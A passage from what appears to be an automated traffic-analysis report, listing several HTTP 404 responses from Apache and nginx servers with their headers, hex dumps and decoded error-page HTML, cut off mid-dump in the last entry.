Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 13:17:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 02 Oct 2024 13:17:16 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 02 Oct 2024 13:17:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 02 Oct 2024 13:17:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 02 Oct 2024 13:17:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 13:17:29 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 13:17:32 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 13:17:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 13:17:37 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 02 Oct 2024 13:17:56 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 02 Oct 2024 13:17:59 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 